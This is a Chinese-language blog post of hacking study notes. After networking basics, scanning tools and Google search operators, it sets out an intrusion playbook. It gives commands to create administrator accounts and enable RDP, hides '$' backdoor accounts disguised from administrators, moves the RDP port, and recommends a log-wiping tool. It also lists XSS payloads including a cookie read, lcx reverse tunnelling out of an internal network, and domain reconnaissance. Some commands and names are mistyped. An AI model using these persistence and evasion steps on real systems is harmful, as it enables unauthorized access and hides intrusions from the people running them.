黑客攻防web安全实战详解

黑客攻防web安全实战详解

第一章:网络基础

###计算机网络
IP协议和TCP/IP模型
ip地址一般为点分十进制,4段,例如192.168.1.1
cmd——>ipconfig 查询本机ip地址

###端口
范围在0-65535
21端口:FTP服务
23端口:Telnet(远程登录)服务
25:SMTP发送邮件
80:HTTP
109、110:POP2,POP3.
135:RPC
137:NetBIOS
3389:远程桌面服务端口
5632:远程软件
8080:同80用于WWW代理服务

cmd——>netstat -on可查看本机开放的端口

Web服务3种协议
HTTP-GET 和 HTTP-POST SOAP(XML web service最常用到的)

第二章:信息搜索与社会工程

whois查询域名的ip和所有者信息的传输协议
SEO综合查询 站长工具

常见的端口扫描技术:

TCP connect()扫描
TCP SYN 扫描
TCP FIN扫描
实战端口扫描

  1. 站长工具
  2. scanport

web目录扫描

1.wwwscan
2.御剑
3.safe3wvs

web漏洞扫描

1.APPscan
2.x-scan
3.nessus
4.在线扫描工具scanv
5.jsky
6.Awvs
7.webcruiser

Googlehack

www.google.com/intl/xx-hacker 黑客专用入口
www.google.com/custom?hl=zh-CN 中文黑客专用信息和资料搜索地址
www.google.com/custom?hl=en 英文黑客专用信息和资料搜索地址

intext或allintext 搜索网站正文
intitle或allintitle 搜索网站标题
cache搜索缓存内容
define 查找关键字的定义
filetype:文件名.后缀名 例如:信息安全论文 filetype:doc
info搜索网站基本信息
inurl或allinurl

inurl: admin/login.asp site:www.sina.con
就会搜索这个网站下的包含 admin/login.sap的链接
inurl:php?id= 搜索包含:php?id=的链接

intitle 网站标题中包含了查询关键词的网页

[攻防 intitle:实战]

site 指定搜索一个站
intext 网站正文

site:xx.com intext:管理
site:xx.com intext:manage
site:xx.com intext:admin
site:xx.com intitle:后台
site:xx.com inurl:admin

搜索网站目录
index
转到父目录
to parent directory

社会工程学

一切利用人自身漏洞的行为都属于社会工程学范畴

入侵

net user test1 123 /add
其中test1 为用户名 123为密码

开启3389端口
“REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal””Server /v fDenyTSConnections /t REG_DWORD /d 0 /f”
提升用户权限:”net localgroup administrators test1 /add”
分别执行这两条命令,或者使用开启3389服务工具

留后门

方法一:安装远控程序
方法二:建立隐蔽的用户,并将远程连接端口3389改为其他端口。
在建立用户帐户时,如果在用户名后面加上$符号,就可以建立一个简单的隐藏帐户,如“test$”。
在字符界面下执行net user命令,就无法查看到这个帐户,但是在图形界面的“本地用户和组”中仍然可以看到。在入侵了一台主机之后,一般都要想办法给自己留一个后门,而给自己加一个管理员组的帐户则是常用的手法。由于带“$”的帐户容易被发现,于是一些人就在帐户的显示名称上下功夫,建立一个看起来和系统帐户类似的名字来迷惑管理员,如admin、sysadmin、Billgates、root等。

net user chun$ password /add 
net localgroup administrators chun$ /add 
这样我们就利用“命令提示符”成功得建立了一个用户名为“chun$”,密码为“password”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限

方法三:
开始 –> 运行 –> regedit –> 确定
依次展开
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
分支,其下的”PortNumber”键值所对应的就是端口号,将其修改即可。上面设置完成后,需要再依次展开
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
分支,同样将其下的”PortNumber”键值进行更改。
比如可以将端口改为13389

清脚印

推荐日志清除工具, aio.exe

跨站脚本利用

1.死循环

<script>
while(true)alert('炸死你!')
</script>

2.隐藏访问

<script>
window.location.href="目标网站"
</script>

3.更加隐蔽访问

<iframe src="目标网站" width="0" height="0"> 
</iframe>

4.获取cookie

<script>
alert(document.cookie);
</script>

web权限提升

mstsc进行远程桌面连接

内网:
1.反相连接
让远程服务器自己来向本地计算机请求,从而解决无法主动向内部服务器发送数据的问题。
lcx.exe是一款著名的反向连接的内网端口映射工具。
本机:lcx-listen 51 3389
这条命令的作用是将本地的51端口与3389端口开启监听状态,并且使两端互相开启映射
服务器:lcx.exe-slave 192.168.49.151 192.168.129 3389
这样3389端口服务器就会向51端口服务器请求连接,并且将从51端口获取的数据传给3389端口。

基于内网的入侵

局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等功能
决定局域网的主要技术要素为:网络拓扑,传输介质与介质访问控制方法。

内网信息刺探

获取主机网络信息

ipconfig查询这台主机的主机名物理mac地址 IP地址 网关地址以及DNS服务器和DHCP服务器地址等信息。在获取了主机网卡信息之后,如果该主机处于域中,还可以通过的命令提示符获取域信息。
使用net view 显示当前域或工作组中的计算机列表,
使用net view /domain[:Domain Name]指定要查看其可用计算机的域,
net user /domain 查看域用户列表
net group “domain admins” /domain 查看管理组成员
net user Administrator/domain 查看域管理员信息
net /help或者net ?获取net命令可操作对象
获取主机用户密码

APR攻击

APR协议可以通过Ip地址获取MAC地址


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 951207194@qq.com

文章标题:黑客攻防web安全实战详解

文章字数:1,522

本文作者:Mang0

发布时间:2018-02-27, 19:57:12

最后更新:2018-11-02, 21:52:07

原始链接:http://mang0.me/archis/2ab3b8ea/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
×

喜欢就点赞,疼爱就打赏